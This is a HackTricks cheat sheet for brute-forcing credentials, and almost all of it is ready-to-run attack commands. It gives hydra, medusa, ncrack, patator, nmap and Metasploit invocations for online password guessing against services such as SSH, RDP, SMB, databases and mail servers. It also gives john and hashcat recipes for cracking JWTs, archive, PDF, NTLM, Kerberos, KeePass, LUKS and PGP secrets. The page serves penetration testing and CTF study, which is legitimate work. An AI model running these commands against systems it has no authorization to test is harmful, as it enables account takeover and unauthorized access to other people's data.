HackTricks
Search…
Pentesting
Powered By GitBook
Brute Force - CheatSheet
Do you use Hacktricks every day? Did you find the book very useful? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks? Support Hacktricks through github sponsors so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!
If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the πŸ’¬β€‹telegram group, or follow me on Twitter πŸ¦β€‹@carlospolopm. If you want to share some tricks with the community you can also submit pull requests to https://github.com/carlospolop/hacktricks that will be reflected in this book and don't forget to give ⭐ on github to motivate me to continue developing this book.

Default Credentials

Search in google for default credentials of the technology that is being used, or try this links:

Create your own Dictionaries

Find as much information about the target as you can and generate a custom dictionary. Tools that may help:

Crunch

1
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
2
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
3
​
4
@ Lower case alpha characters
5
, Upper case alpha characters
6
% Numeric characters
7
^ Special characters including spac
8
crunch 6 8 -t ,@@^^%%
Copied!

Cewl

1
cewl example.com -m 5 -w words.txt
Copied!

​CUPP​

Generate passwords based on your knowledge of the victim (names, dates...)
1
python3 cupp.py -h
Copied!

​pydictor​

Wordlists

Services

Ordered alphabetically by service name.

AFP

1
nmap -p 548 --script afp-brute <IP>
2
msf> use auxiliary/scanner/afp/afp_login
3
msf> set BLANK_PASSWORDS true
4
msf> set USER_AS_PASS true
5
msf> set PASS_FILE <PATH_PASSWDS>
6
msf> set USER_FILE <PATH_USERS>
7
msf> run
Copied!

AJP

1
nmap --script ajp-brute -p 8009 <IP>
Copied!

Cassandra

1
nmap --script cassandra-brute -p 9160 <IP>
Copied!

CouchDB

1
msf> use auxiliary/scanner/couchdb/couchdb_login
2
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Copied!

Docker Registry

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Copied!

Elasticsearch

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
Copied!

FTP

1
hydra -l root -P passwords.txt [-t 32] <IP> ftp
2
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
Copied!

HTTP Generic Brute

​WFuzz​

HTTP Basic Auth

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2
# Use https-get mode for httpS
3
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
Copied!

HTTP - Post Form

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
2
# Use https-post-form mode for httpS
Copied!
For https you have to change from "http-post-form" to "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

1
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
Copied!

IMAP

1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
3
nmap -sV --script imap-brute -p <PORT> <IP>
Copied!

IRC

1
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
Copied!

ISCSI

1
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
Copied!

JWT

1
#hashcat
2
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
3
​
4
#https://github.com/Sjord/jwtcrack
5
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
6
​
7
#John
8
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
9
​
10
#https://github.com/ticarpi/jwt_tool
11
python3 jwt_tool.py -d wordlists.txt <JWT token>
12
​
13
#https://github.com/brendan-rius/c-jwt-cracker
14
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
15
​
16
#https://github.com/mazen160/jwt-pwn
17
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
18
​
19
#https://github.com/lmammino/jwt-cracker
20
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
Copied!

LDAP

1
nmap --script ldap-brute -p 389 <IP>
Copied!

Mongo

1
nmap -sV --script mongodb-brute -n -p 27017 <IP>
2
use auxiliary/scanner/mongodb/mongodb_login
Copied!

MySQL

1
hydra -L usernames.txt -P pass.txt <IP> mysql
2
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
Copied!

OracleSQL

1
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
2
​
3
./odat.py passwordguesser -s $SERVER -d $SID
4
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
5
​
6
#msf1
7
msf> use admin/oracle/oracle_login
8
msf> set RHOSTS <IP>
9
msf> set RPORT 1521
10
msf> set SID <SID>
11
​
12
#msf2, this option uses nmap and it fails sometimes for some reason
13
msf> use scanner/oracle/oracle_login
14
msf> set RHOSTS <IP>
15
msf> set RPORTS 1521
16
msf> set SID <SID>
17
​
18
#nmap fails sometimes for some reson executing this script
19
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
Copied!
In order to use oracle_login with patator you need to install:
1
pip3 install cx_Oracle --upgrade
Copied!
​Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
1
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Copied!

POP

1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
Copied!

PostgreSQL

1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
2
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
3
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
4
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
5
use auxiliary/scanner/postgres/postgres_login
6
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
Copied!

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/​
1
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
2
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
Copied!

RDP

1
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
2
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Copied!

Redis

1
msf> use auxiliary/scanner/redis/redis_login
2
nmap --script redis-brute -p 6379 <IP>
3
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
Copied!

Rexec

1
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Copied!

Rlogin

1
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Copied!

Rsh

1
hydra -L <Username_list> rsh://<Victim_IP> -v -V
Copied!

Rsync

1
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
Copied!

RTSP

1
hydra -l root -P passwords.txt <IP> rtsp
Copied!

SNMP

1
msf> use auxiliary/scanner/snmp/snmp_login
2
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
3
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
4
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
Copied!

SMB

1
nmap --script smb-brute -p 445 <IP>
2
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
Copied!

SMTP

1
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
2
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
Copied!

SOCKS

1
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
Copied!

SQL Server

1
#Use the NetBIOS name of the machine as domain
2
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
3
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
4
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
5
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
6
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
Copied!

SSH

1
hydra -l root -P passwords.txt [-t 32] <IP> ssh
2
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
4
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
Copied!

Telnet

1
hydra -l root -P passwords.txt [-t 32] <IP> telnet
2
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
Copied!

VNC

1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
2
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
3
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
4
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
5
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
Copied!

Winrm

1
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Copied!

Local

Online cracking databases

Check this out before trying to bruteforce a Hash.

ZIP

1
#sudo apt-get install fcrackzip
2
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
Copied!
1
zip2john file.zip > zip.john
2
john zip.john
Copied!
1
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
2
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
3
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Copied!

7z

1
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
Copied!
1
#Download and install requirements for 7z2john
2
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
3
apt-get install libcompress-raw-lzma-perl
4
./7z2john.pl file.7z > 7zhash.john
Copied!

PDF

1
apt-get install pdfcrack
2
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
3
#pdf2john didnt worked well, john didnt know which hash type was
4
# To permanently decrypt the pdf
5
sudo apt-get install qpdf
6
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
Copied!

JWT

1
git clone https://github.com/Sjord/jwtcrack.git
2
cd jwtcrack
3
​
4
#Bruteforce using crackjwt.py
5
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
6
​
7
#Bruteforce using john
8
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
9
john jwt.john #It does not work with Kali-John
Copied!

NTLM cracking

1
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
3
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Copied!

Keepass

1
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
2
keepass2john file.kdbx > hash #The keepass is only using password
3
keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
4
#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
5
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Copied!

Keberoasting

1
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
2
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
3
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Copied!

Lucks image

Method 1

1
bruteforce-luks -f ./list.txt ./backup.img
2
cryptsetup luksOpen backup.img mylucksopen
3
ls /dev/mapper/ #You should find here the image mylucksopen
4
mount /dev/mapper/mylucksopen /mnt
Copied!

Method 2

1
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
2
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
3
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
4
cryptsetup luksOpen backup.img mylucksopen
5
ls /dev/mapper/ #You should find here the image mylucksopen
6
mount /dev/mapper/mylucksopen /mnt
Copied!

Mysql

1
#John hash format
2
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
3
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
Copied!

PGP/GPG Private key

1
gpg2john private_pgp.key #This will generate the hash, save it in a file
2
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Copied!

Tools

Hash-identifier

1
hash-identifier
2
> <HASH>
Copied!

John mutation

Read /etc/john/john.conf and configure it
1
john --wordlist=words.txt --rules --stdout > w_mutated.txt
2
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
Copied!

Hashcat

1
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Copied!
Cracking Linux Hashes - /etc/shadow file
1
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
3
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
4
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Copied!
Cracking Windows Hashes
1
3000 | LM | Operating-Systems
2
1000 | NTLM | Operating-Systems
Copied!
Cracking Common Application Hashes
1
900 | MD4 | Raw Hash
2
0 | MD5 | Raw Hash
3
5100 | Half MD5 | Raw Hash
4
100 | SHA1 | Raw Hash
5
10800 | SHA-384 | Raw Hash
6
1400 | SHA-256 | Raw Hash
7
1700 | SHA-512 | Raw Hash
Copied!
Last modified 18d ago